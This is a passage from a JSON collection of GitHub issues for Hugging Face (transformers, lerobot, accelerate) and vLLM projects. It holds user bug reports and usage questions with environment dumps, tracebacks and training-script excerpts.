", "url": "https://github.com/huggingface/transformers/issues/41554", "state": "closed", "labels": [], "created_at": "2025-10-13T23:20:20Z", "updated_at": "2025-11-24T08:03:05Z", "comments": 5, "user": "lorsonblair" }, { "repo": "huggingface/lerobot", "number": 2186, "title": "how to load pi0?", "body": "i use this code to load pi0:\n\n```python\nfrom lerobot.policies.pi0.modeling_pi0 import PI0Policy\nimport torch\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\npretrained_policy_path = \"lerobot/pi0_libero_base\"\n\npolicy = PI0Policy.from_pretrained(pretrained_policy_path).to(device)\n```\n\nbut throws an error:\n\n```bash\nTraceback (most recent call last):\n File \"/home/wjg/pi0.py\", line 16, in \n policy = PI0Policy.from_pretrained(pretrained_policy_path).to(device)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 923, in from_pretrained\n model = cls(config, **kwargs)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 872, in __init__\n self.model = PI0Pytorch(config)\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 513, in __init__\n self.paligemma_with_expert = PaliGemmaWithExpertModel(\n File \"/data/wjg_files/lerobot/src/lerobot/policies/pi0/modeling_pi0.py\", line 337, in __init__\n vlm_config_hf = CONFIG_MAPPING[\"paligemma\"]()\nTypeError: 'NoneType' object is not subscriptable\n```\n\nhow can i load pi0?", "url": "https://github.com/huggingface/lerobot/issues/2186", "state": "closed", "labels": [ "question", "policies", "python" ], "created_at": "2025-10-13T12:24:32Z", "updated_at": "2025-10-17T09:53:02Z", "user": "Addog666" }, { "repo": "huggingface/accelerate", "number": 3812, "title": "RuntimeError during load_state", "body": "### System Info\n\nThis issue is related to [prior issue 3101](https://github.com/huggingface/accelerate/issues/3101), but it hasn\u2019t been fully resolved yet. The current workaround is to avoid using `safetensors`.\n\n@Narsil suggested using [`load_file/save_file`](https://github.com/huggingface/safetensors/issues/657#issuecomment-3396215002). However, I noticed that accelerate currently uses [save_file](https://github.com/huggingface/accelerate/blob/main/src/accelerate/utils/other.py#L373) for saving and use [load_model](https://github.com/huggingface/accelerate/blob/main/src/accelerate/checkpointing.py#L238) for loading.\n\nIs there any known workaround or recommended fix for this inconsistency?\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nPlease see the [prior issue 3101](https://github.com/huggingface/accelerate/issues/3101).\n\n### Expected behavior\n\nPlease see the [prior issue 3101](https://github.com/huggingface/accelerate/issues/3101).", "url": "https://github.com/huggingface/accelerate/issues/3812", "state": "closed", "labels": [], "created_at": "2025-10-13T11:25:17Z", "updated_at": "2025-11-21T15:07:49Z", "comments": 2, "user": "Silverster98" }, { "repo": "huggingface/lerobot", "number": 2185, "title": "Has the lerobot data format been modified after June this year?", "body": "Has the lerobot data format been modified after June this year? 
The original data can no longer be used.", "url": "https://github.com/huggingface/lerobot/issues/2185", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2025-10-13T10:07:41Z", "updated_at": "2025-10-14T08:05:04Z", "user": "Addog666" }, { "repo": "huggingface/transformers", "number": 41539, "title": "All POETRY operations fail on latest version 4.57.0", "body": "### System Info\n\nI import transformers (always latest) in my poetry project.\nI use poetry 2.1.2\n\nAfter this transformers release (4.57.0) I regenerated the poetry lock with command: `poetry lock`\n\nThen when retrying to generate the lock again after other updates - it fails with message:\n\n`Could not parse constrains version: `\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nDoing a simple search in the poetry.lock file I found out that transformers latest package needs `optax ()`\nwhich produces this failure because poetry does not know how to parse this type of version.\n\nNote I am sure that this is the problem because commenting out the transformers the lock works fine, and also by using 4.56.2 from September it also works fine and that `optax ()` cannot be found in the lock in this case.\n\n### Expected behavior\n\nA developer should be able to use the latest transformers package version with poetry.", "url": "https://github.com/huggingface/transformers/issues/41539", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-13T08:40:49Z", "updated_at": "2025-10-13T14:18:02Z", "comments": 1, "user": "bfuia" }, { "repo": "vllm-project/vllm", "number": 26692, "title": "[Usage]: How to release KVCache?", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by conda-forge | (main, Jun 4 2025, 14:45:31) [GCC 13.3.0] (64-bit runtime)\nPython platform : Linux-5.15.0-25-generic-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: NVIDIA L20\nGPU 1: NVIDIA L20\nGPU 2: NVIDIA L20\nGPU 3: NVIDIA L20\n\nNvidia driver version : 550.127.05\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 52 bits physical, 57 bits virtual\nByte Order: Little Endian\nCPU(s): 128\nOn-line CPU(s) list: 0-127\nVendor ID: GenuineIntel\nModel name: INTEL(R) XEON(R) GOLD 6530\nCPU family: 6\nModel: 207\nThread(s) per core: 2\nCore(s) per socket: 32\nSocket(s): 
2\nStepping: 2\nCPU max MHz: 4000.0000\nCPU min MHz: 800.0000\nBogoMIPS: 4200.00\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx pdpe1gb rdtscp lm constant_tsc art arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc cpuid aperfmperf tsc_known_freq pni pclmulqdq dtes64 monitor ds_cpl vmx smx est tm2 ssse3 sdbg fma cx16 xtpr pdcm pcid dca sse4_1 sse4_2 x2apic movbe popcnt tsc_deadline_timer aes xsave avx f16c rdrand lahf_lm abm 3dnowprefetch cpuid_fault epb cat_l3 cat_l2 cdp_l3 invpcid_single cdp_l2 ssbd mba ibrs ibpb stibp ibrs_enhanced tpr_shadow vnmi flexpriority ept vpid ept_ad fsgsbase tsc_adjust bmi1 avx2 smep bmi2 erms invpcid cqm rdt_a avx512f avx512dq rdseed adx smap avx512ifma clflushopt clwb intel_pt avx512cd sha_ni avx512bw avx512vl xsaveopt xsavec xgetbv1 xsaves cqm_llc cqm_occup_llc cqm_mbm_total cqm_mbm_local avx_vnni avx512_bf16 wbnoinvd dtherm ida arat pln pts hwp hwp_act_window hwp_epp hwp_pkg_req avx512vbmi umip pku ospke waitpkg avx512_vbmi2 gfni vaes vpclmulqdq avx512_vnni avx512_bitalg tme avx512_vpopcntdq la57 rdpid bus_lock_detect cldemote movdiri movdir64b enqcmd fsrm md_clear serialize tsxldtrk pconfig arch_lbr avx512_fp16 flush_l1d arch_capabilities\nVirtualization: VT-x\nL1d cache: 3 MiB (64 instances)\nL1i cache: 2 MiB (64 instances)\nL2 cache: 128 MiB (64 instances)\nL3 cache: 320 MiB (2 instances)\nNUMA node(s): 4\nNUMA node0 CPU(s): 0-15,64-79\nNUMA node1 CPU(s): 16-31,80-95\nNUMA node2 CPU(s): 32-47,96-111\nNUMA node3 CPU(s): 48-63,112-127\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Spec store bypass: Mitigation; Speculative Store Bypass disabled via prctl and seccomp\nVulnerability Spectre v1: Mitigation; usercopy/swapgs barriers and __user pointer sanitization\nVulnerability Spectre v2: Mitigation; Enhanced IBRS, IBPB conditional, RSB filling\nVulnerability Srbds: Not affected\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3", "url": "https://github.com/vllm-project/vllm/issues/26692", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-13T08:28:20Z", "updated_at": "2025-10-13T08:28:20Z", "comments": 0, "user": "shenxf1205" }, { "repo": "huggingface/lerobot", "number": 2184, "title": "How to let an episode realize it has finished the task?", "body": "I have successfully trained my real-world lerobot to do several simple tasks from human demonstrations. Say, push an object from point A to point B. I noticed that after the robot arm has finished the task, it would return to its initial pose (same as the human demonstration) and stay idle for the remainder of the episode, until time finishes.\n\nOf course, if I manually move the cup back to point A from point B before the time finishes, it would attempt to finish the job again. 
But I just wanted to know if there's any way the episode can finish itself, or at least yield a signal, after the first successful attempt?\n\nI'm using lerobot_record.py with a specified policy file path. The policy is act.\n\nThank you", "url": "https://github.com/huggingface/lerobot/issues/2184", "state": "open", "labels": [], "created_at": "2025-10-13T06:27:36Z", "updated_at": "2025-12-22T07:56:00Z", "user": "genkv" }, { "repo": "vllm-project/vllm", "number": 26660, "title": "[Usage]: Is there any way to enable beam search in online inference?", "body": "### Your current environment\n\nIs there any way to enable beam search in the `vllm serve` command? Or is beam search only available in offline inference code?\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). I don't know how to integrate it with vllm.\n\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26660", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-12T13:55:07Z", "updated_at": "2025-10-17T17:12:45Z", "comments": 1, "user": "tiesanguaixia" }, { "repo": "huggingface/transformers", "number": 41533, "title": "add_special_tokens and resize_token_embeddings result in an error", "body": "### System Info\n\nI want to add a few special tokens to my Qwen2.5VL model as separators, and after executing the following code, I received the following error message. I don't know how to solve this problem.\n``` bash\n[rank1]: Traceback (most recent call last):\n[rank1]: RuntimeError: shape '[-1, 151936]' is invalid for input of size 329273399\n[rank0]: Traceback (most recent call last):\n[rank0]: RuntimeError: shape '[-1, 151936]' is invalid for input of size 217038339\n[rank3]: Traceback (most recent call last):\n[rank3]: RuntimeError: shape '[-1, 151936]' is invalid for input of size 116936799\n[rank2]: Traceback (most recent call last):\n[rank2]: RuntimeError: shape '[-1, 151936]' is invalid for input of size 215673318\nTraceback (most recent call last):\n  File \"/home/hk-project-p0022189/tum_yvc3016/miniconda3/envs/qwen2_5-VL/lib/python3.10/site-packages/torch/distributed/elastic/multiprocessing/errors/init.py\", line 355, in wrapper\n    raise ChildFailedError(\ntorch.distributed.elastic.multiprocessing.errors.ChildFailedError:\nqwenvl/train/train_livecc.py FAILED\nFailures:\n\nRoot Cause (first observed failure):\nerror_file: \ntraceback : To enable traceback see: https://pytorch.org/docs/stable/elastic/errors.html\n```\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\n``` python\nimport os\nimport logging\nimport pathlib\nimport torch\nimport transformers\nimport json\nfrom typing import Dict\nimport shutil\nimport sys\nfrom pathlib import Path\n\nproject_root = Path(__file__).parent.parent.parent\nsys.path.append(str(project_root))\n\nimport qwenvl.train.trainer\nfrom trainer import replace_qwen2_vl_attention_class\n\nfrom transformers import (\n    Qwen2VLForConditionalGeneration,\n)\n\nfrom model_code.modeling_qwen2_5_vl import Qwen2_5_VLForConditionalGeneration
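\n\n# Hedged fix sketch, not part of the original script: the \"shape '[-1, 151936]'\n# is invalid\" failures above usually mean the loss still reshapes logits with the\n# old vocab size after new tokens were added. Right after the tokenizer grows,\n# something along these lines keeps logits and labels shape-consistent:\n#\n#     model.resize_token_embeddings(len(tokenizer))\n#     # and verify the vocab size actually used by the loss matches:\n#     assert model.get_input_embeddings().weight.shape[0] == len(tokenizer)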
\n\n\n# from qwenvl.data.data_qwen import make_supervised_data_module\nfrom qwenvl.data.lmm_dataset_for_batch import make_supervised_data_module\nfrom qwenvl.train.argument import (\n    ModelArguments,\n    DataArguments,\n    TrainingArguments,\n)\nfrom transformers import AutoTokenizer, AutoProcessor, Qwen2VLImageProcessor, Trainer\n\nlocal_rank = None\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\n\n\ndef rank0_print(*args):\n    if local_rank == 0:\n        print(*args)\n\n\ndef add_special_tokens_safely(tokenizer, new_tokens):\n    \"\"\"\n    Safely add new special tokens to the tokenizer while preserving the existing additional_special_tokens.\n\n    Args:\n        tokenizer: Hugging Face tokenizer\n        model: the corresponding language model\n        new_tokens: list of str, the new tokens to add\n\n    Returns:\n        bool: whether any new tokens were added\n    \"\"\"\n    # Get all tokens currently in the vocabulary\n    current_vocab = set(tokenizer.get_vocab().keys())\n\n    # Filter down to the tokens that actually need to be added\n    tokens_to_add = [t for t in new_tokens if t not in current_vocab]\n    if not tokens_to_add:\n        rank0_print(\"\ud83d\udfe2 All specified tokens already exist in the vocabulary; nothing to add.\")\n        return False\n\n    # Get the existing additional_special_tokens (e.g. , etc.)\n    orig_special_tokens = tokenizer.special_tokens_map.get(\n        \"additional_special_tokens\", []\n    )\n\n    # Merge: keep the existing tokens + the new ones\n    updated_special_tokens = orig_special_tokens + [\n        t for t in tokens_to_add if t not in orig_special_tokens\n    ]\n\n    rank0_print(f\"\ud83d\udccc Adding new tokens: {tokens_to_add}\")\n    rank0_print(f\"\ud83d\udd27 Total additional_special_tokens after update: {len(updated_special_tokens)}\")\n\n    # Use the add_special_tokens API (it deduplicates automatically)\n    num_added = tokenizer.add_special_tokens(\n        {\"additional_special_tokens\": updated_special_tokens}\n    )\n\n    if num_added > 0:\n        rank0_print(f\"\u2705 Successfully added {num_added} new tokens to the vocabulary\")\n\n    return num_added > 0\n\n\ndef safe_save_model_for_hf_trainer(trainer: transformers.Trainer, output_dir: str):\n    \"\"\"Collects the state dict and dumps it to disk.\"\"\"\n\n    if trainer.deepspeed:\n        torch.cuda.synchronize()\n        trainer.save_model(output_dir)\n        return\n\n    state_dict = trainer.model.state_dict()\n    if trainer.args.should_save:\n        cpu_state_dict = {key: value.cpu() for key, value in state_dict.items()}\n        del state_dict\n        trainer._save(output_dir, state_dict=cpu_state_dict)  # noqa\n\n\ndef set_model(model_args, model):\n    if model_args.tune_mm_vision:\n        for n, p in model.visual.named_parameters():\n            p.requires_grad = True\n    else:\n        for n, p in model.visual.named_parameters():\n            p.requires_grad = False\n\n    if model_args.tune_mm_mlp:\n        for n, p in model.visual.merger.named_parameters():\n            p.requires_grad = True\n    else:\n        for n, p in model.visual.merger.named_parameters():\n            p.requires_grad = False\n\n    if model_args.tune_mm_llm:\n        for n, p in model.model.named_parameters():\n            p.requires_grad = True\n        model.lm_head.requires_grad = True\n    else:\n        for n, p in model.model.named_parameters():\n            p.requir", "url": "https://github.com/huggingface/transformers/issues/41533", "state": "closed", "labels": [ "bug" ], "created_at": 
"2025-10-12T13:50:40Z", "updated_at": "2025-10-13T14:09:29Z", "comments": 3, "user": "jialiangZ" }, { "repo": "huggingface/lerobot", "number": 2181, "title": "How to chage SmolVLA action_chunk_size?", "body": "I want to change 'action_chunk_size' from 50 to 10. I ran the command like this : \n'''\npython lerobot/scripts/train.py --policy.path=lerobot/smolvla_base --dataset.repo_id=Datasets/grasp_put --batch_size=16 --steps=40000 --output_dir=outputs/train/vla_chunk10 --job_name=smolvla_training --policy.device=cuda --policy.push_to_hub=false --policy.action_chunk_size=10\n'''\nbut it doesn't work\n'train.py: error: unrecognized arguments: --action_chunk_size=10'\nand I found it can enter this parameter in the terminal :\nusage: train.py [-h] [--policy.action_chunk_size str]\n\nHow should I resolve this problem?", "url": "https://github.com/huggingface/lerobot/issues/2181", "state": "closed", "labels": [ "question", "policies", "python" ], "created_at": "2025-10-12T13:29:35Z", "updated_at": "2025-10-17T11:25:55Z", "user": "CCCY-0304" }, { "repo": "huggingface/transformers", "number": 41532, "title": "where is examples/rag from original paper?", "body": "### System Info\n\nhttps://arxiv.org/pdf/2005.11401 mentions https://github.com/huggingface/transformers/blob/main/examples/rag but it is not there. Add redirect if possible\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nGo to https://github.com/huggingface/transformers/blob/main/examples/rag\n\n### Expected behavior\n\nsome example instead of 404", "url": "https://github.com/huggingface/transformers/issues/41532", "state": "closed", "labels": [ "bug" ], "created_at": "2025-10-12T13:17:53Z", "updated_at": "2025-10-17T09:34:15Z", "user": "IgorKasianenko" }, { "repo": "vllm-project/vllm", "number": 26653, "title": "[Usage]: Qwen3VL image coordinates issue", "body": "### Your current environment\n\nHi, i found same image, same prompt, the vLLM serving qwen3vl always have wrong cooridnates back.\n\nthis is vllm return:\n\nResponse: \"{\\\"click_type\\\": \\\"left_click\\\", \\\"coordinate\\\": [815, 961]}\"\n\n\"Image\"\n\nAs you can see, when visualize, the VLLM returned x offset is totally far wrong.\n\nQwen3 official return. Same A3B model.\n\nDoes the input were cropped or something? \n\nMy server side just used: \n\n```\nvllm serve checkpoints/Qwen3-VL-30B-A3B-Instruct \\\n --dtype auto --max-model-len 4096 \\\n --api-key token-abc123 \\\n --gpu_memory_utilization 0.9 \\\n --trust-remote-code \\\n --port 8000 \\\n --served-model-name 'qwen3-vl' \\\n --max-model-len 8k \\\n --limit-mm-per-prompt '{\"video\": 3}' \\\n --enable-auto-tool-choice \\\n --tool-call-parser hermes \n```\n\n**note**: when visualize i have already mapping the cordiantes to image space, here just compare raw output, it still biased much on x-axis.\n\n\n\n### How would you like to use vllm\n\nI want to run inference of a [specific model](put link here). 
\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/26653", "state": "closed", "labels": [ "usage" ], "created_at": "2025-10-12T07:02:29Z", "updated_at": "2025-10-13T03:56:53Z", "comments": 2, "user": "lucasjinreal" }, { "repo": "huggingface/accelerate", "number": 3811, "title": "ValueError: Could not find the transformer layer class QwenImageTransformerBlock in the model.", "body": "Hi, I am trying to fine-tune qwen-image-edit using accelerate in FSDP mode. I want to wrap the ``QwenImageTransformerBlock`` in transformer and ``Qwen2_5_VLVisionBlock,Qwen2_5_VLDecoderLayer`` in text_encoder. I set the environment params\n```\nimport os\n\n\ndef set_fsdp_env():\n    os.environ[\"ACCELERATE_USE_FSDP\"] = 'true'\n    os.environ[\"FSDP_AUTO_WRAP_POLICY\"] = 'TRANSFORMER_BASED_WRAP'\n    os.environ[\"FSDP_BACKWARD_PREFETCH\"] = 'BACKWARD_PRE'\n    os.environ[\"FSDP_TRANSFORMER_CLS_TO_WRAP\"] = 'QwenImageTransformerBlock,Qwen2_5_VLVisionBlock,Qwen2_5_VLDecoderLayer'\n    os.environ[\"FSDP_CPU_RAM_EFFICIENT_LOADING\"] = 'false'\n```\nand prepare the two models\n```\ntransformer = accelerator.prepare(transformer)\ntext_encoder = accelerator.prepare(text_encoder)\n```\nFinally, I encountered the error raised from ``text_encoder = accelerator.prepare(text_encoder)``\n```\nValueError: Could not find the transformer layer class QwenImageTransformerBlock in the model.\n```\nHow can I resolve this problem? Thanks!\n", "url": "https://github.com/huggingface/accelerate/issues/3811", "state": "closed", "labels": [], "created_at": "2025-10-11T10:13:14Z", "updated_at": "2025-11-22T15:06:54Z", "comments": 2, "user": "garychan22" }, { "repo": "huggingface/lerobot", "number": 2172, "title": "Add support for remote GPUs (with async inference!)", "body": "Hello,\nI'm a student in a non-first-world country, and unfortunately I don't own a PC with an NVIDIA GPU - it costs about $1200 for a decent setup. On the other hand, it costs only $0.12-0.24/hr to rent RTX 4090 instances, so it's pretty cheap to simply rent a computer whenever I need to collect data or train.\n\nBut, to my knowledge, LeRobot - unlike e.g. most LLM or vision trainers - runs only locally. I haven't tried, but given Async Inference it should be very feasible to stream to a local browser from a remote instance. In particular, for data collection. 
\n\nThis will make robotics dataset generation (significantly) more accessible.\n\nI may be able to PR this one, it should be straightforward.\n\nCheers.", "url": "https://github.com/huggingface/lerobot/issues/2172", "state": "open", "labels": [ "enhancement", "question" ], "created_at": "2025-10-11T08:49:32Z", "updated_at": "2025-12-19T06:35:21Z", "user": "MRiabov" }, { "repo": "huggingface/transformers", "number": 41518, "title": "Add Structured Prompt Templates Registry for LLM / VLM / Diffusion Tasks", "body": "### Feature request\n\nIntroduce transformers.prompt_templates \u2014 a YAML-based registry and accessor API:\n\n```\nfrom transformers import PromptTemplates\n\nPromptTemplates.get(\"summarization\") # \"Summarize the following text:\"\nPromptTemplates.list_tasks() # [\"summarization\",\"vqa\",\"ocr\",...]\n```\n\n- Templates stored as yaml/json under src/transformers/prompt_templates/templates/.\n- Accessor + validation in registry.py.\n- Optional CLI command transformers-cli list-prompts.\n- Pipelines can import a template by task name instead of hard-coding.\n\n### Motivation\n\nEvery pipeline and model today embeds its own prompt strings (e.g., summarization, OCR, VQA).\nThis duplication makes results inconsistent and hard to benchmark.\nA central registry of task-specific prompt templates would unify defaults and enable easy community additions.\n\n### Your contribution\n\nI\u2019ll implement the registry module, add unit tests and docs, and migrate 1\u20132 pipelines (summarization / captioning) to use it.\nContributor: [@Aki-07](https://github.com/Aki-07)", "url": "https://github.com/huggingface/transformers/issues/41518", "state": "open", "labels": [ "Feature request" ], "created_at": "2025-10-11T08:10:20Z", "updated_at": "2025-10-13T15:06:20Z", "comments": 2, "user": "Aki-07" }, { "repo": "vllm-project/vllm", "number": 26616, "title": "[Usage]: How to enable MTP when using Qwen3-Next in local infer ( not vllm serve)", "body": "### Your current environment\n\n```text\nCollecting environment information...\n==============================\n System Info\n==============================\nOS : Ubuntu 22.04.2 LTS (x86_64)\nGCC version : (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0\nClang version : Could not collect\nCMake version : Could not collect\nLibc version : glibc-2.35\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 | packaged by Anaconda, Inc. 
| (main, Jun 5 2025, 13:09:17) [GCC 11.2.0] (64-bit runtime)\nPython platform : Linux-4.18.0-2.6.8.kwai.x86_64-x86_64-with-glibc2.35\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : 11.8.89\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration :\nGPU 0: NVIDIA A100 80GB PCIe\nGPU 1: NVIDIA A100 80GB PCIe\nGPU 2: NVIDIA A100 80GB PCIe\nGPU 3: NVIDIA A100 80GB PCIe\n\nNvidia driver version : 550.54.14\ncuDNN version : Probably one of the following:\n/usr/lib/x86_64-linux-gnu/libcudnn.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_adv_train.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_cnn_train.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_infer.so.8.9.0\n/usr/lib/x86_64-linux-gnu/libcudnn_ops_train.so.8.9.0\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nAddress sizes: 48 bits physical, 48 bits virtual\nByte Order: Little Endian\nCPU(s): 96\nOn-line CPU(s) list: 0-95\nVendor ID: AuthenticAMD\nModel name: AMD EPYC 7V13 64-Core Processor\nCPU family: 25\nModel: 1\nThread(s) per core: 1\nCore(s) per socket: 48\nSocket(s): 2\nStepping: 1\nBogoMIPS: 4890.88\nFlags: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm rep_good nopl cpuid extd_apicid aperfmperf pni pclmulqdq ssse3 fma cx16 pcid sse4_1 sse4_2 movbe popcnt aes xsave avx f16c rdrand hypervisor lahf_lm cmp_legacy cr8_legacy abm sse4a misalignsse 3dnowprefetch osvw topoext perfctr_core invpcid_single vmmcall fsgsbase bmi1 avx2 smep bmi2 erms invpcid rdseed adx smap clflushopt clwb sha_ni xsaveopt xsavec xgetbv1 xsaves clzero xsaveerptr arat umip vaes vpclmulqdq rdpid\nHypervisor vendor: Microsoft\nVirtualization type: full\nL1d cache: 3 MiB (96 instances)\nL1i cache: 3 MiB (96 instances)\nL2 cache: 48 MiB (96 instances)\nL3 cache: 384 MiB (12 instances)\nNUMA node(s): 4\nNUMA node0 CPU(s): 0-23\nNUMA node1 CPU(s): 24-47\nNUMA node2 CPU(s): 48-71\nNUMA node3 CPU(s): 72-95\nVulnerability Itlb multihit: Not affected\nVulnerability L1tf: Not affected\nVulnerability Mds: Not affected\nVulnerability Meltdown: Not affected\nVulnerability Spec store bypass: Vulnerable\nVulnerability Spectre v1: Vulnerable: __user pointer sanitization and usercopy barriers only; no swapgs barriers\nVulnerability Spectre v2: Vulnerable, STIBP: disabled\nVulnerability Tsx async abort: Not affected\n\n==============================\nVersions of relevant libraries\n==============================\n[pip3] numpy==2.2.6\n[pip3] nvidia-cublas-cu12==12.8.4.1\n[pip3] nvidia-cuda-cupti-cu12==12.8.90\n[pip3] nvidia-cuda-nvrtc-cu12==12.8.93\n[pip3] nvidia-cuda-runtime-cu12==12.8.90\n[pip3] nvidia-cudnn-cu12==9.10.2.21\n[pip3] nvidia-cudnn-frontend==1.14.1\n[pip3] nvidia-cufft-cu12==11.3.3.83\n[pip3] nvidia-cufile-cu12==1.13.1.3\n[pip3] nvidia-curand-cu12==10.3.9.90\n[pip3] nvidia-cusolver-cu12==11.7.3.90\n[pip3] nvidia-cusparse-cu12==12.5.8.93\n[pip3] nvidia-cusparselt-cu12==0.7.1\n[pip3] nvidia-ml-py==13.580.82\n[pip3] nvidia-nccl-cu12==2.27.3\n[pip3] nvidia-nvjitlink-cu12==12.8.93\n[pip3] nvidia-nvtx-cu12==12.8.90\n[pip3] pyzmq==27.1.0\n[pip3] torch==2.8.0\n[pip3] torchaudio==2.8.0\n[pip3] 
torchvision==0.23.0\n[pip3] transformers==4.57.0\n[pip3] triton==3.4.0\n[conda] nu", "url": "https://github.com/vllm-project/vllm/issues/26616", "state": "open", "labels": [ "usage" ], "created_at": "2025-10-11T03:58:14Z", "updated_at": "2025-10-16T08:45:35Z", "comments": 1, "user": "Kimagure7" }, { "repo": "vllm-project/vllm", "number": 26614, "title": "[Usage]: attn_metadata.seq_lens is not equal to attn_metadata.num_actual_tokens", "body": "### Your current environment\n\n```\nCollecting environment information...\nuv is set\n==============================\n System Info\n==============================\nOS : Ubuntu 20.04.6 LTS (x86_64)\nGCC version : (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\nClang version : Could not collect\nCMake version : version 3.16.3\nLibc version : glibc-2.31\n\n==============================\n PyTorch Info\n==============================\nPyTorch version : 2.8.0+cu128\nIs debug build : False\nCUDA used to build PyTorch : 12.8\nROCM used to build PyTorch : N/A\n\n==============================\n Python Environment\n==============================\nPython version : 3.12.11 (main, Jul 23 2025, 00:34:44) [Clang 20.1.4 ] (64-bit runtime)\nPython platform : Linux-5.4.0-216-generic-x86_64-with-glibc2.31\n\n==============================\n CUDA / GPU Info\n==============================\nIs CUDA available : True\nCUDA runtime version : Could not collect\nCUDA_MODULE_LOADING set to : LAZY\nGPU models and configuration : \nGPU 0: NVIDIA H20\nGPU 1: NVIDIA H20\nGPU 2: NVIDIA H20\nGPU 3: NVIDIA H20\nGPU 4: NVIDIA H20\nGPU 5: NVIDIA H20\nGPU 6: NVIDIA H20\nGPU 7: NVIDIA H20\n\nNvidia driver version : 555.42.06\ncuDNN version : Could not collect\nHIP runtime version : N/A\nMIOpen runtime version : N/A\nIs XNNPACK available : True\n\n==============================\n CPU Info\n==============================\nArchitecture: x86_64\nCPU op-mode(s): 32-bit, 64-bit\nByte Order: Little Endian\nAddress sizes: 52 bits physical, 57 bits virtual\nCPU(s): 224\nOn-line CPU(s) list: 0-223\nThread(s) per core: 2\nCore(s) per socket: 56\nSocket(s): 